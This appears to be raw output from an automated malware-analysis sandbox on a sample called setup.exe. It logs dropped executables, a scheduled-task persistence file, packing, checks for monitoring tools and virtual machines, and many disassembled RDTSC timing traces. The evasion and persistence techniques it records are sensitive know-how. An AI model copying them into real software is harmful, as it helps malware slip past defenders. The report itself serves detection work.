Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Section loaded: textshaping.dll	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe

Window detected: Number of UI elements: 20

Source: setup.exe

Static file information: File size 1888768 > 1048576

Source: setup.exe

Static PE information: Raw size of sgwszepm is bigger than: 0x100000 < 0x19ba00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\setup.exe	Unpacked PE file: 0.2.setup.exe.320000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sgwszepm:EW;gtgrasql:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sgwszepm:EW;gtgrasql:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 1.2.explorti.exe.280000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sgwszepm:EW;gtgrasql:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sgwszepm:EW;gtgrasql:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 5.2.explorti.exe.280000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sgwszepm:EW;gtgrasql:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sgwszepm:EW;gtgrasql:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: explorti.exe.0.dr	Static PE information: real checksum: 0x1dcfdd should be: 0x1d5acb
Source: setup.exe	Static PE information: real checksum: 0x1dcfdd should be: 0x1d5acb

Source: setup.exe	Static PE information: section name:
Source: setup.exe	Static PE information: section name: .idata
Source: setup.exe	Static PE information: section name:
Source: setup.exe	Static PE information: section name: sgwszepm
Source: setup.exe	Static PE information: section name: gtgrasql
Source: setup.exe	Static PE information: section name: .taggant
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: sgwszepm
Source: explorti.exe.0.dr	Static PE information: section name: gtgrasql
Source: explorti.exe.0.dr	Static PE information: section name: .taggant
Source: putty.exe.5.dr	Static PE information: section name: .00cfg
Source: putty.exe.5.dr	Static PE information: section name: .voltbl
Source: putty[1].exe.5.dr	Static PE information: section name: .00cfg
Source: putty[1].exe.5.dr	Static PE information: section name: .voltbl

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 5_2_0029D84C push ecx; ret	5_2_0029D85F
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BCE1BC push esi; ret	7_2_00BCE1BE
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BCD29A push esi; ret	7_2_00BCD29C
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BCD2D6 push esi; ret	7_2_00BCD2D8
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BE6765 push edi; iretd	7_2_00BE6766
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00C5B9A3 push ecx; ret	7_2_00C5B9B6

Source: setup.exe	Static PE information: section name: entropy: 7.976698587403563
Source: setup.exe	Static PE information: section name: sgwszepm entropy: 7.954044165897789
Source: explorti.exe.0.dr	Static PE information: section name: entropy: 7.976698587403563
Source: explorti.exe.0.dr	Static PE information: section name: sgwszepm entropy: 7.954044165897789

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Jump to dropped file
Source: C:\Users\user\Desktop\setup.exe	File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\putty[1].exe	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

File created: C:\Windows\Tasks\explorti.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BA8280 IsIconic,SetWindowTextW,SetWindowTextA,	7_2_00BA8280
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BA83E0 IsIconic,ShowWindow,	7_2_00BA83E0
Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe	Code function: 7_2_00BA8330 IsIconic,SetWindowTextW,SetWindowTextA,	7_2_00BA8330

Source: C:\Users\user\AppData\Local\Temp\1000009001\putty.exe

Code function: 7_2_00BD52B0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WSAStartup,WSAStartup,WSAStartup,

7_2_00BD52B0

Source: C:\Users\user\Desktop\setup.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\setup.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 38EA65 second address: 38EA6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 38EA6A second address: 38EA70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 38EA70 second address: 38EA83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c jng 00007FEA5C6FB9E6h 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 507214 second address: 507218 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 507218 second address: 50722C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jo 00007FEA5C6FB9E6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 50722C second address: 507256 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FEA5CDC3A16h 0x00000008 ja 00007FEA5CDC3A16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FEA5CDC3A26h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 507256 second address: 507261 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 50620E second address: 506230 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A20h 0x00000007 jno 00007FEA5CDC3A16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007FEA5CDC3A1Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 506230 second address: 506234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5068C0 second address: 5068E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FEA5CDC3A16h 0x0000000f jmp 00007FEA5CDC3A23h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5068E2 second address: 5068E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5068E6 second address: 5068F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FEA5CDC3A16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5068F2 second address: 5068F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 509A9B second address: 509ABD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FEA5CDC3A1Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 509ABD second address: 509AF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5C6FB9EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FEA5C6FB9F7h 0x00000014 popad 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 509AF5 second address: 509AF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 509AF9 second address: 509AFF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 509AFF second address: 509B59 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEA5CDC3A28h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov dword ptr [ebp+122D35F3h], ebx 0x00000011 lea ebx, dword ptr [ebp+1244E830h] 0x00000017 call 00007FEA5CDC3A1Ah 0x0000001c mov esi, dword ptr [ebp+122D3355h] 0x00000022 pop edx 0x00000023 jng 00007FEA5CDC3A17h 0x00000029 stc 0x0000002a push eax 0x0000002b pushad 0x0000002c push esi 0x0000002d jmp 00007FEA5CDC3A22h 0x00000032 pop esi 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 509BB4 second address: 509BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 509BB8 second address: 509BEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007FEA5CDC3A18h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 cld 0x00000023 push 00000000h 0x00000025 call 00007FEA5CDC3A19h 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 509BEE second address: 509BF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 509BF2 second address: 509C22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jns 00007FEA5CDC3A2Bh 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 509C22 second address: 509CAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FEA5C6FB9ECh 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f jmp 00007FEA5C6FB9F7h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 jmp 00007FEA5C6FB9EBh 0x0000001d pop eax 0x0000001e push 00000003h 0x00000020 pushad 0x00000021 push ecx 0x00000022 pop eax 0x00000023 cld 0x00000024 popad 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push edx 0x0000002a call 00007FEA5C6FB9E8h 0x0000002f pop edx 0x00000030 mov dword ptr [esp+04h], edx 0x00000034 add dword ptr [esp+04h], 00000019h 0x0000003c inc edx 0x0000003d push edx 0x0000003e ret 0x0000003f pop edx 0x00000040 ret 0x00000041 jmp 00007FEA5C6FB9EAh 0x00000046 clc 0x00000047 push 00000003h 0x00000049 mov dword ptr [ebp+122D1C4Ch], ecx 0x0000004f push 9CD87D05h 0x00000054 push eax 0x00000055 push edx 0x00000056 push esi 0x00000057 jmp 00007FEA5C6FB9EBh 0x0000005c pop esi 0x0000005d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 509CAF second address: 509CB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 509D4B second address: 509D8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FEA5C6FB9E6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 mov dword ptr [ebp+122D3317h], esi 0x00000017 push 00000000h 0x00000019 jmp 00007FEA5C6FB9F9h 0x0000001e mov esi, edx 0x00000020 push 27099001h 0x00000025 push eax 0x00000026 push edx 0x00000027 push ecx 0x00000028 pushad 0x00000029 popad 0x0000002a pop ecx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 509D8A second address: 509D90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 509D90 second address: 509D94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 509D94 second address: 509E1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 27099081h 0x0000000f push 00000003h 0x00000011 mov cx, bx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007FEA5CDC3A18h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 jc 00007FEA5CDC3A1Bh 0x00000036 sbb cx, 6B71h 0x0000003b push 00000003h 0x0000003d push 00000000h 0x0000003f push ebx 0x00000040 call 00007FEA5CDC3A18h 0x00000045 pop ebx 0x00000046 mov dword ptr [esp+04h], ebx 0x0000004a add dword ptr [esp+04h], 00000019h 0x00000052 inc ebx 0x00000053 push ebx 0x00000054 ret 0x00000055 pop ebx 0x00000056 ret 0x00000057 mov dword ptr [ebp+122D35E2h], edi 0x0000005d push D5308467h 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007FEA5CDC3A21h 0x00000069 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 509E1B second address: 509EA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5C6FB9F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 15308467h 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007FEA5C6FB9E8h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a mov edx, dword ptr [ebp+122D360Bh] 0x00000030 add dword ptr [ebp+122D25FFh], esi 0x00000036 mov edi, dword ptr [ebp+122D3366h] 0x0000003c lea ebx, dword ptr [ebp+1244E844h] 0x00000042 call 00007FEA5C6FB9F2h 0x00000047 sub di, D7A0h 0x0000004c pop edi 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 je 00007FEA5C6FB9E6h 0x00000057 jmp 00007FEA5C6FB9EDh 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4FDDA4 second address: 4FDDA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 527F31 second address: 527F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4FDD7C second address: 4FDD80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4FDD80 second address: 4FDDA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEA5C6FB9F9h 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5286B2 second address: 5286BC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEA5CDC3A16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5289AA second address: 5289AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 51EE82 second address: 51EE8F instructions: 0x00000000 rdtsc 0x00000002 je 00007FEA5CDC3A16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4FC19A second address: 4FC19F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4FC19F second address: 4FC1B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FEA5CDC3A16h 0x00000009 jnl 00007FEA5CDC3A16h 0x0000000f ja 00007FEA5CDC3A16h 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4FC1B8 second address: 4FC1DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA5C6FB9F7h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 528F01 second address: 528F0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FEA5CDC3A16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 528F0B second address: 528F11 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 528F11 second address: 528F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FEA5CDC3A16h 0x0000000e rdtsc
